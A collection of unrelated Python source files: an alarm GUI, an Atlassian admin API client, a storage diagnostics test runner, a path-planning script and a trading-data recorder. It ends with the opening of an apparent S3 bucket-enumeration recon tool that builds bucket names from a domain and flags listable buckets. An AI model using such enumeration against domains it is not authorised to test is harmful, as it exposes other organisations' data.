self.minutes_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.am_pm_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.active_button.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.add_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.save_button.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.cancel_button.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
def confirm_add_alarm(self):
self.confirm = messagebox.askyesno(message="Are you sure you want to complete this action?", icon="question", title="Confirm Action",
default="yes")
if self.confirm is True:
am_pm = int(self.am_pm.get())
if am_pm == 0:
am_pm = "AM"
elif am_pm == 1:
am_pm = "PM"
else:
print("There was an error with the am_pm value:", am_pm)
raise ValueError
new_hr = str(self.new_hr.get())
new_min = str(self.new_min.get())
if len(new_hr) == 1:
new_hr = "0" + new_hr
if len(new_min) == 1:
new_min = "0" + new_min
time = new_hr + ":" + new_min + " " + am_pm
active = int(self.new_active.get())
if active == 0:
active = "False"
elif active == 1:
active = "True"
else:
print("There was an error with the active value:", active)
raise ValueError
self.db.insert(time, active)
self.alarms_canvas.delete("all")
self.add_alarms()
self.add_window.destroy()
elif self.confirm is False:
self.add_window.destroy()
else:
print("There was an error with the self.confirm value:", self.confirm)
self.confirm_add_alarm()
def on_canvas_resize(self, *args):
self.alarms.width = self.alarms_canvas.winfo_width()
self.alarms_canvas.itemconfig('alarms',
width=self.alarms_canvas.winfo_width())
self.alarms_canvas.update_idletasks()
if __name__ == "__main__":
root = tk.Tk()
root.geometry("600x185")
root.minsize(420, 170)
root.title("Alarms")
alarms = Alarms(root)
alarms.pack(fill=tk.BOTH, expand=1)
def on_close():
alarms.db.close()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_close)
root.mainloop()
|
management.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Get access to the Atlassian User Management REST API.
You can use the same API key for the organizations REST API and the user management REST API.
Create an API key from this URL https://confluence.atlassian.com/x/jPnJOQ
This API provides all the access to the User management REST API.
"""
import typing as t
import requests
import threading
import re
from jiraone.exceptions import JiraOneErrors
from collections import deque
# Define APIs
class UserManagement:
"""
The UserManagement API is used to access organization profiles on Atlassian sites.
The alias to this class is called ``manage``
It comes with the below attributes and methods.
.. code-block:: python
token = "YUISNxxx"
manage.api_token(token)
manage.LINK # attribute
manage.AUTH # attribute
"""
# Define constants
LINK = "https://api.atlassian.com"
AUTH = {"Accept": "application/json"}
def __init__(self) -> None:
"""
A Constructor which also helps with property initialization.
"""
# Property entry point.
self._org_id_ = None
self._org_ids_ = None
self._domain_id_ = None
self._policy_id_ = None
self._event_id_ = None
def get_user_permission(self, account_id: str, query: list = None) -> t.Any:
"""Returns the set of permissions you have for managing the specified Atlassian account.
:param account_id: A user string value for Atlassian accounts
:param query: A query parameter of Array<string>
*Valid options*
Valid values: profile, profile.write, profile.read, email.set, lifecycle.enablement,
apiToken.read, apiToken.delete
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage" if query is None else \
f"{self.LINK}/users/{account_id}/manage?{query}"
return requests.get(url, headers=self.AUTH)
def manage_profile(self, account_id: str, method: str = "GET", **kwargs: t.Any) -> t.Any:
"""Returns information about a single Atlassian account by ID by using a "GET" request.
:request PATCH: Updates fields in a user account.
The profile.write privilege details which fields you can change.
:request PUT: Sets the specified user's email address.
Before using this endpoint, you must verify the target domain
:param account_id: A user string value for Atlassian accounts
:param method: A response method condition
*Available options*
:request GET: Get the return request
:request PATCH: Updates a given set of data
                 :body parameter: any or all fields of the user object
e.g. {"name": "Lila User", "nickname": "marshmallow"}
:request PUT: Change the email account of the user
:body parameter: email - string
e.g. {"email": "prince.nyeche@elfapp.website"}
:param kwargs: - Contains other options passed to the requests.<patch>
.. code-block:: python
# previous expression
# json=<variable_name>
payload = {"email": "prince.nyeche@elfapp.website"}
manage.manage_profile("account_id", "<method>", json=payload)
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage/profile" if method.lower() == "get" or method.lower() == "patch" \
else f"{self.LINK}/users/{account_id}/manage/email"
if method.lower() == "get":
return requests.get(url, headers=self.AUTH)
if method.lower() == "patch":
return requests.patch(url, **kwargs, headers=self.AUTH)
if method.lower() == "put":
return requests.put(url, **kwargs, headers=self.AUTH)
else:
raise JiraOneErrors("wrong", "The method you posted is not available for this operation.")
def api_token(self, account_id: str, method: str = "GET", token_id: str = None) -> t.Any:
"""Gets the API tokens owned by the specified user
or Deletes a specified API token by ID.
:param account_id: A user string value for Atlassian accounts
:param method: A response method condition
:param token_id: A user token id to be deleted.
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage/api-tokens" if token_id is None else \
f"{self.LINK}/users/{account_id}/manage/api-tokens/{token_id}"
if method.lower() == "get":
return requests.get(url, headers=self.AUTH)
elif method.lower() == "delete":
return requests.delete(url, headers=self.AUTH)
else:
raise JiraOneErrors("wrong", "Unexpected method received. Only \"GET\" or \"DELETE\" methods allowed")
def manage_user(self, account_id: str, disable: bool = True, **kwargs) -> t.Any:
"""Disables the specified user account.
The permission to make use of this resource is exposed by the lifecycle.enablement privilege.
OR
Enables the specified user account.
The permission to make use of this resource is exposed by the lifecycle.enablement privilege.
:param account_id: A user string value for Atlassian accounts
        :param disable: A bool option; if True, the disable endpoint is used,
                        otherwise the enable endpoint.
:param kwargs: Additional keyword argument to pass body data
*Options available when disable is False*
.. code-block:: python
# previous expression
payload = {"message": "On 6-month suspension"}
manage.manage_user("account_id", json=payload)
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
url = f"{self.LINK}/users/{account_id}/manage/lifecycle/disable" if disable is True else \
f"{self.LINK}/users/{account_id}/manage/lifecycle/enable"
return requests.post(url, **kwargs, headers=self.AUTH)
def get_organization(self, org_id: t.Optional[str] = None,
filter_by: t.Optional[str] = None,
domain_id: t.Optional[str] = None,
event_id: t.Optional[str] = None,
action: t.Optional[bool] = True,
policy_id: t.Optional[str] = None,
**kwargs: t.Any) -> t.Any:
"""GET request for the organization API.
Returns a list of your organizations (based on your API key).
Returns information about a single organization by ID.
Returns a list of users in an organization.
Returns a list of domains in an organization one page at a time.
Returns information about a single verified domain by ID.
Returns information about a single event by ID.
Returns information about org policies
Returns information about a single policy by ID
:param org_id: Retrieve the organization id from the API key
:param domain_id: Retrieve domain details
:param filter_by: Use to determine the endpoint to return
*Valid options*
* users - return the users in an organization
* domains - list of domains in an organization
* events - list of events in an audit log
* policies - get the policy of the organization
:param event_id: Use to determine the events in the audit log
        :param action: Additional argument for events. If True (the default),
                       the event-actions endpoint is queried instead of
                       individual events, e.g. action=True
:param policy_id: An id of the policy
:param kwargs: Optional arguments
*Valid options*
Any response argument
e.g json=payload
data=payload
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
org_id = self._org_id_ if org_id is None else org_id
if filter_by is None:
if org_id is None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="org")
return resp
elif org_id is not None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
else:
if filter_by == "users":
if org_id is not None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/users"
return requests.get(url, headers=self.AUTH, **kwargs)
elif filter_by == "domains":
if org_id is not None and domain_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/domains"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="domain")
return resp
elif org_id is not None and domain_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/domains/{domain_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
elif filter_by == "events":
if org_id is not None:
if action is False and event_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/events"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="event")
return resp
elif action is False and event_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/events/{event_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
elif action is True and event_id is None or event_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/event-actions"
return requests.get(url, headers=self.AUTH, **kwargs)
elif filter_by == "policies":
if org_id is not None:
if policy_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies"
resp = requests.get(url, headers=self.AUTH, **kwargs)
self._parse_data_obj(resp, types="policy")
return resp
elif policy_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}"
return requests.get(url, headers=self.AUTH, **kwargs)
else:
raise JiraOneErrors("wrong", "Unexpected error - unable to determine parameter value")
def manage_organization(self, org_id: str, method: str = "POST",
policy_id: t.Optional[str] = None,
resource_id: t.Optional[str] = None,
**kwargs: t.Any) -> t.Any:
"""Create, put and delete organization data
Create a policy for an org
Send a post request by using method="post" as keyword args
Update a policy for an org.
Send a put request by using method="put" as keyword args
You will need to send a payload for the body using the example shown below
.. code-block:: json
{
"id": "<string>",
"type": "policy",
"attributes": {
"type": "ip-allowlist",
"name": "<string>",
"status": "enabled",
"rule": {},
"resources": [
{
"id": "<string>",
"meta": {
"scheduledDate": "<string>",
"migrationStartDateTime": "<string>",
"migrationEndDataTime": "<string>",
"atlassianAccountId": "<string>"
},
"links": {
"ticket": "<string>"
}
}
]
}
}
Delete a policy for an org
:param org_id: ID of the organization to create policy for
:param method: A response method to set
*Valid options*
* PUT - updates resource
* POST - creates resource
* DELETE - removes resources
:param policy_id: ID of the policy
:param resource_id: Resource ID
        :param kwargs: Additional data to send in the request body
:return: Any
"""
if "Authorization" not in self.AUTH:
raise JiraOneErrors("login", "You need to authenticate to use this resource")
if method.lower() == "post":
if org_id is not None and policy_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies"
return requests.post(url, headers=self.AUTH, **kwargs)
elif org_id is not None and policy_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}/resources"
return requests.post(url, headers=self.AUTH, **kwargs)
elif method.lower() == "put":
if org_id is not None and policy_id is not None and resource_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}"
return requests.put(url, headers=self.AUTH, **kwargs)
elif org_id is not None and policy_id is not None and resource_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}/resources/{resource_id}"
return requests.put(url, headers=self.AUTH, **kwargs)
elif method.lower() == "delete":
if org_id is not None and policy_id is not None and resource_id is None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}"
return requests.delete(url, headers=self.AUTH, **kwargs)
elif org_id is not None and policy_id is not None and resource_id is not None:
url = f"{self.LINK}/admin/v1/orgs/{org_id}/policies/{policy_id}/resources/{resource_id}"
return requests.delete(url, headers=self.AUTH, **kwargs)
else:
raise JiraOneErrors("wrong", "Method is not allowed - unexpected option entered method argument.")
@property
def org_id(self):
"""Get property of organization id"""
return self._org_id_
@org_id.setter
def org_id(self, content):
"""Sets the value property of organization id"""
self._org_id_ = content
@property
def org_ids(self):
"""Get property of organization ids"""
return self._org_ids_
@org_ids.setter
def org_ids(self, content):
"""Sets the value property of organization ids"""
self._org_ids_ = content
@property
def domain_id(self):
"""Get property of organization domain id"""
return self._domain_id_
@domain_id.setter
def domain_id(self, content):
"""Sets the value property of organization domain id"""
self._domain_id_ = content
@property
def policy_id(self):
"""Get property of organization policy id"""
return self._policy_id_
@policy_id.setter
def policy_id(self, content):
"""Sets the value property of organization policy id"""
self._policy_id_ = content
@property
def event_id(self):
"""Get property of organization event id"""
return self._event_id_
@event_id.setter
def event_id(self, content):
"""Sets the value property of organization event id"""
self._event_id_ = content
def __repr__(self):
return f"<JiraOne: {self.LINK} \n" \
f"This API is accessible>"
def _parse_data_obj(self, data: requests.Response, types: str = "org") -> None:
"""Parse JSON response object for organization properties.
:param data: A response object
:param types: A string of available attributes
:return: None
"""
        many = []
        total = -1 if types in ("org", "domain") else data.json()['meta']['total']
        count = 0
        for ids in data.json()['data']:
            if 'id' not in ids:
                continue
            if total == -1:
                many.append(ids['id'])
            elif count < total:
                # Collect each item's id up to the reported total.
                count += 1
                many.append(ids['id'])
if len(many) == 1:
if types == "org":
self._org_id_ = many[0]
elif types == "policy":
self._policy_id_ = many[0]
elif types == "domain":
self._domain_id_ = many[0]
elif types == "event":
self._event_id_ = many[0]
if len(many) > 1:
if types == "org":
self._org_ids_ = many
elif types == "policy":
self._policy_id_ = many
elif types == "domain":
self._domain_id_ = many
elif types == "event":
self._event_id_ = many
def add_token(self, token: str) -> None:
"""Adds a Bearer token to authenticate the API.
:param token: An API key
:return: None
"""
if not isinstance(token, str):
raise JiraOneErrors("value", "An API token of type string is required")
if token == "":
raise JiraOneErrors("value", "Your API token cannot be an empty string.")
self.AUTH.update({"Authorization": f"Bearer {token}"})
        # Make a request to get the organization id, domain_id and policy_id and
        # store them on the matching <name>_id properties.
        try:
            # Get access to property values. Note: Thread.run() (unlike start())
            # executes the target synchronously in the current thread.
            threading.Thread(target=self.get_organization).run()
            threading.Thread(target=self.get_organization, kwargs={"filter_by": "policies"}).run()
            threading.Thread(target=self.get_organization, kwargs={"filter_by": "domains"}).run()
# This property is accessible to premium / enterprise users, so turning off this feature by default,
# You can still call this from the events request.
# threading.Thread(target=self.get_organization, kwargs={"filter_by": "events", "action": False}).run()
except KeyError:
raise JiraOneErrors("warning", "Your connection has failed. Please check the response to see the reason!")
def get_all_users(self, source, detail: bool = False) -> deque:
"""Store all user list from organization, so we can search them by email.
:param source: A JSON response payload
:param detail: Bool defaults to False
:return: Deque List
"""
exit("Your source data isn't a valid JSON object.") if not isinstance(source, t.Mapping) else ""
user_collection = deque()
exit(f"Incorrect data type {type(detail)} for keyword argument 'detail'. "
f"Expecting bool type") \
if not isinstance(detail, bool) else True if detail is True else False
print("Checking organization users...")
while True:
next_item_data = source['links']['next'] if 'links' in source \
and len(source['links']) > 1 else {}
for item in source['data']:
user_data = {
"account_id": item.get('account_id'),
"email": item.get('email')
} if detail is False else \
{
"account_id": item.get('account_id'),
"email": item.get('email'),
"account_type": item.get('account_type'),
"account_status": item.get('account_status'),
"name": item.get('name'),
"product_access": item.get('product_access'),
"link": item.get('links'),
"access_billable": item.get('access_billable'),
"picture": item.get('picture'),
"last_active": item.get('last_active')
}
                if detail is False:
                    user_collection.append(list(user_data.values()))
                else:
                    user_collection.append(user_data)
            # next_item_data is a URL string while more pages exist and an empty
            # dict otherwise, so reaching a dict means this was the last page.
            if isinstance(next_item_data, dict):
                break
source = requests.get(next_item_data, headers=self.AUTH).json()
return user_collection
@staticmethod
def find_user(query: str, source: t.List = None) -> t.Union[t.Dict, t.List]:
"""Finds a specific user.
        :param query: A search term; it can be an email, display name or accountId if
                      the ``source`` data is obtained from ``self.get_all_users`` with ``detail=True``
:param source: A list of users
:returns: A dict of the user data or a list of the data
"""
search = None
pattern_name = r"[\s]" # This could be the name of a person
pattern_email = r"[\@]" # This could be an email address
pattern_aaid = r"[{5|6|7|8}[a-z]+" # This could be the account_id
for term in source:
if len(re.findall(pattern_aaid, query)) > 3:
if 'account_id' in term:
if term['account_id'] == query:
search = term
else:
if term[0] == query:
search = term
if len(re.findall(pattern_email, query)) == 1:
if 'email' in term:
if term['email'] == query:
search = term
else:
if term[1] == query:
search = term
if len(re.findall(pattern_name, query)) == 1:
if 'name' in term:
if term['name'] == query:
search = term
else:
raise JiraOneErrors("value", "You cannot search with displayName, received 2 items only.")
return search
manage = UserManagement()
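# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). It assumes you hold a
# valid organization API key; the token and account id below are placeholders.
if __name__ == "__main__":
    manage.add_token("<your-organization-api-key>")
    # Organization details for the cached org_id and the users in it.
    org_details = manage.get_organization().json()
    org_users = manage.get_organization(filter_by="users").json()
    print(org_details)
    print(len(org_users.get("data", [])), "users returned on the first page")
    # Example of suspending a (hypothetical) managed account:
    # manage.manage_user("<account-id>", json={"message": "On 6-month suspension"})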
|
node_test.py
|
# (c) Copyright [2015] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from subprocess import Popen, PIPE
from threading import Thread
from Queue import Queue, Empty
import time
class NodeTest():
io_q = None
proc = None
errors_occurred = False
error_text = ''
test_result_text = ''
stream_open = True
def stream_watcher(self, identifier, stream):
        for line in stream:
            # Forward each line of output to the shared queue for the printer thread.
            self.io_q.put((identifier, line))
        if not stream.closed:
            self.stream_open = False
            stream.close()
def printer(self):
while True:
try:
item = self.io_q.get(True, 1)
except Empty:
# no output in either stream for 1 sec so check if we are done
if self.proc.poll() is not None:
break
else:
identifier, line = item
                if identifier == 'STDERR':
test_line = line.lower()
if 'failed' in test_line or 'error' in test_line:
self.errors_occurred = True
self.error_text += line
else:
self.test_result_text += line
def run_credentials_check_test(self, conf_data):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', 'ssh-credentials-check', '-f',
'json', '-conf-data', conf_data],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
def run_options_check_test(self, conf_data):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', '-v', 'options-check', '-f',
'json', '-conf-data', conf_data,
'-incl-system-info',
'-incl-replication-checks'],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
def run_software_check_test(self, conf_data, software_test_data):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', '-v', 'software-check', '-f', 'json',
'-conf-data', conf_data,
'-software-pkgs', software_test_data],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
def run_volume_paths_test(self, conf_data, os_vars, attached_volumes):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', '-v', 'volume-paths-check', '-f',
'json', '-conf-data', conf_data,
'-os-vars', os_vars,
'-attached-volumes', attached_volumes],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
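# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). It assumes the
# `cinderdiags` CLI is installed and that conf_data holds the JSON-encoded
# cinder.conf contents the tool expects; the value below is a placeholder.
if __name__ == '__main__':
    conf_data = '<json-encoded cinder.conf data>'
    tester = NodeTest()
    tester.run_credentials_check_test(conf_data)
    if tester.errors_occurred:
        print(tester.error_text)
    else:
        print(tester.test_result_text)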
|
main.py
|
import json
import os
import tkinter
import threading
import numpy as np
from PIL import Image, ImageTk, ImageSequence
from model import PathPlanning
from optimizers import fit_value, fit_policy
from visualizations import plot_analysis
from utils import store_to_file
BASE_DIR = os.getcwd()
RESULTS_DIR = os.path.join(BASE_DIR, "results")
DATA_DIR = os.path.join(RESULTS_DIR, "txt_data")
os.makedirs(DATA_DIR, exist_ok=True)
def main(userInputData):
world_params = {
"cor_pr": 0.9,
"wr_pr": 0.0142857,
"n_actions": 8,
"goalReward": 1,
"obstReward": -15,
"stayReward": -0.03,
"gamma": 0.98,
}
world_params["maxRow"] = userInputData["maxRow"]
world_params["maxCol"] = userInputData["maxCol"]
world_params["num_obstacle_pts"] = userInputData["num_obstacle_pts"]
world_params["startRow"] = userInputData["startRow"]
world_params["startCol"] = userInputData["startCol"]
world_params["goalRow"] = userInputData["goalRow"]
world_params["goalCol"] = userInputData["goalCol"]
tm = PathPlanning(world_params)
tm.get_obstacles()
tm.build_map()
tm.build_st_trans_matrix()
tm.build_reward_matrix()
world_data = {}
world_data["st"] = tm.st.tolist()
world_data["rm"] = tm.rm.tolist()
world_data["gamma"] = tm.gamma
world_data["num_states"] = tm.num_states
world_data["startRow"] = tm.startRow
world_data["startCol"] = tm.startCol
world_data["goalRow"] = tm.goalRow
world_data["goalCol"] = tm.goalCol
world_data["oCol"] = tm.oCol
world_data["oRow"] = tm.oRow
world_data["m"] = tm.m.tolist()
world_data["maxRow"] = tm.maxRow
world_data["maxCol"] = tm.maxCol
os.chdir(DATA_DIR)
print("Storing PolicyIteration data to file")
store_to_file(world_data, "data_world.txt")
with open("data_world.txt") as json_data:
world_data = json.load(json_data)
world_data["st"] = np.array(world_data["st"])
world_data["rm"] = np.array(world_data["rm"])
world_data["m"] = np.array(world_data["m"])
# Policy Iteration Experimentations
print("Experiments with Policy Iteration")
data_policy = fit_policy(
world_data["st"],
world_data["rm"],
world_data["gamma"],
world_data["num_states"],
)
# Storing policy data to file
print("Storing PolicyIteration data to file")
store_to_file(data_policy, "data_policy.txt")
# Value Iteration Experimentations
print("Experiments with Value Iteration")
data_value = fit_value(
world_data["st"],
world_data["rm"],
world_data["gamma"],
world_data["num_states"],
)
# Storing value data to file
print("Storing ValueIteration data to file")
store_to_file(data_value, "data_value.txt")
# Showing plots
plot_analysis(
"data_world.txt",
"data_value.txt",
"data_policy.txt",
world_params["obstReward"],
)
def animate(canvas, root, sequence, image, counter):
canvas.itemconfig(image, image=sequence[counter])
root.after(
20,
lambda: animate(
canvas, root, sequence, image, (counter + 1) % len(sequence)
),
)
def loading():
temp = tkinter.Tk()
canvas = tkinter.Canvas(temp, width=400, height=400)
canvas.pack()
sequence = [
ImageTk.PhotoImage(img)
for img in ImageSequence.Iterator(Image.open(r"load.gif"))
]
image = canvas.create_image(200, 200, image=sequence[0])
animate(canvas, temp, sequence, image, 1)
temp.mainloop()
def threader(userinputData):
t1 = threading.Thread(target=loading)
t2 = threading.Thread(target=main, args=(userinputData,))
t2.start()
t1.start()
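# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). The grid dimensions,
# obstacle count and start/goal cells below are arbitrary placeholders;
# threader() shows the loading GIF while the planner runs in a second thread.
if __name__ == "__main__":
    user_input = {
        "maxRow": 10,
        "maxCol": 10,
        "num_obstacle_pts": 15,
        "startRow": 0,
        "startCol": 0,
        "goalRow": 9,
        "goalCol": 9,
    }
    threader(user_input)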
|
engine.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/10/28 0028 9:31
# @Author : Hadrianl
# @File : engine
import traceback
from typing import Optional
from vnpy.event import Event, EventEngine
from vnpy.trader.event import EVENT_TICK, EVENT_TRADE, EVENT_LOG
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.utility import load_json, save_json
from vnpy.trader.object import LogData
from vnpy.app.ib_cta_strategy.base import EVENT_CTA_LOG
from influxdb import InfluxDBClient
from threading import Thread
from queue import Queue, Empty
APP_NAME = "InfluxRecorder"
class InfluxRecorderEngine(BaseEngine):
""""""
setting_filename = "influx_recorder_setting.json"
db_name = "vnpy_record"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self._retry = 5
self.retention_policy_name = 'rt'
self.host = "localhost"
self.port = 8086
self.user = ""
self.password = ""
self.thread = Thread(target=self.run)
self.queue = Queue(100)
self.active = False
self.influx_client: Optional[InfluxDBClient] = None
self.handler = {
EVENT_TICK: self.process_tick_event,
EVENT_TRADE: self.process_trade_event,
EVENT_LOG: self.process_log_event,
EVENT_CTA_LOG: self.process_cta_log_event,
}
self.load_setting()
def run(self):
self.register_event()
while self.active:
try:
ev = self.queue.get(timeout=1)
self.handler[ev.type](ev)
except Empty:
continue
except Exception:
self.active = False
self.unregister_event()
def start_recorder(self, host, port, user, password):
""""""
self.influx_client = InfluxDBClient(host, port, user, password, self.db_name)
self.influx_client.ping()
self.influx_client.create_database(self.db_name)
self.influx_client.create_retention_policy(self.retention_policy_name, '7d', '1', shard_duration='1d')
self.active = True
self.thread.start()
def stop_recorder(self):
""""""
self.active = False
        if self.thread.is_alive():
self.thread.join()
self.influx_client = None
def load_setting(self):
""""""
setting = load_json(self.setting_filename)
self.host = setting.get("host", self.host)
self.port = setting.get("port", self.port)
self.user = setting.get("user", self.user)
self.password = setting.get("password", self.password)
def save_setting(self):
""""""
setting = {
"host": self.host,
"port": self.port,
"user": self.user,
"password": self.password,
}
save_json(self.setting_filename, setting)
def register_event(self):
""""""
for k in self.handler:
self.event_engine.register(k, self.queue.put)
def unregister_event(self):
""""""
for k in self.handler:
self.event_engine.unregister(k, self.queue.put)
def process_tick_event(self, event: Event):
""""""
tickdata = event.data
ticks = [{
"measurement": "tick",
"tags": {
"symbol": tickdata.symbol,
"exchange": tickdata.exchange.value,
},
"fields": {
"last": float(tickdata.last_price),
"ask": float(tickdata.ask_price_1),
"bid": float(tickdata.bid_price_1),
"lastvol": float(tickdata.last_volume),
"askvol": float(tickdata.ask_volume_1),
"bidvol": float(tickdata.bid_volume_1),
"volume": tickdata.volume,
}
}]
self.influx_client.write_points(ticks, retention_policy=self.retention_policy_name)
def process_trade_event(self, event: Event):
""""""
tradedata = event.data
trades = [{
"measurement": "trade",
"tags": {
"symbol": tradedata.symbol,
"exchange": tradedata.exchange.value,
"direction": tradedata.direction.value,
},
"fields": {
"datetime": tradedata.datetime.strftime('%Y-%m-%dT%H:%M:%S'),
"price": tradedata.price,
"volume": tradedata.volume,
"orderRef": tradedata.orderRef,
"vt_orderid": tradedata.vt_orderid,
"vt_tradeid": tradedata.vt_tradeid,
}
}]
self.influx_client.write_points(trades, retention_policy=self.retention_policy_name)
def process_log_event(self, event: Event):
""""""
logdata = event.data
logs = [{
"measurement": "log",
"tags": {
"level": logdata.level,
},
"fields": {
"datetime": logdata.time.strftime('%Y-%m-%dT%H:%M:%S'),
"msg": logdata.msg,
}
}]
self.influx_client.write_points(logs, retention_policy=self.retention_policy_name)
def process_cta_log_event(self, event: Event):
""""""
logdata = event.data
logs = [{
"measurement": "cta_log",
"tags": {
"level": logdata.level,
},
"fields": {
"datetime": logdata.time.strftime('%Y-%m-%dT%H:%M:%S'),
"msg": logdata.msg,
}
}]
self.influx_client.write_points(logs, retention_policy=self.retention_policy_name)
def close(self):
""""""
self.active = False
        if self.thread.is_alive():
self.thread.join()
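# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). It assumes a local
# InfluxDB instance is reachable with the placeholder credentials below and
# that constructing a vnpy MainEngine/EventEngine pair directly is acceptable
# for a quick manual test.
if __name__ == "__main__":
    event_engine = EventEngine()
    main_engine = MainEngine(event_engine)
    recorder = InfluxRecorderEngine(main_engine, event_engine)
    recorder.start_recorder("localhost", 8086, "<user>", "<password>")
    try:
        input("Recording ticks/trades/logs to InfluxDB. Press Enter to stop.")
    finally:
        recorder.close()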
|
buckethead.py
|
#!/usr/bin/env python3
# Author: Dwight Hohnstein, Rhino Security Labs (dwight.hohnstein@rhinosecuritylabs.com)
from subprocess import check_output, CalledProcessError
from os import devnull
import logging
import sys
import traceback
from optparse import OptionParser
from queue import Queue
from threading import Thread
from settings import S3_REGIONS
logging.basicConfig(filename='bucket-tally.log', level=logging.INFO)
bucket_q = Queue()
bucket_q_size = 0
# Bucketlist to sort buckets based on permissions.
bucketlist = {
"exists": [],
"listable": [],
}
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
def check_region_choice(regions):
"""
Check that the region passed to the script is valid. If all,
return all regions.
Args:
regions (str): Comma separated string of regions.
Returns:
list: List of AWS regions.
"""
regions = [x.strip() for x in regions.split(",")]
if "all" in regions:
return S3_REGIONS
elif not all(x in S3_REGIONS for x in regions):
# Not all regions passed to program are valid, raise error.
print("Invalid option passed for -r (--regions). Regions must be one or more of the following:")
print("all, {}".format(", ".join(S3_REGIONS)))
exit(1)
else:
# Every region passed is valid!
return regions
def create_bucket_list(domain, affixes=[]):
"""
Create a set of buckets based on a domain name and a list of affixes.
Note: This will be very large.
    Args:
        domain (str): Domain to add affixes to, such as google.com
        affixes (list): List of affixes to prefix and suffix to domain.
Returns:
set: Set of domain permutations.
Example:
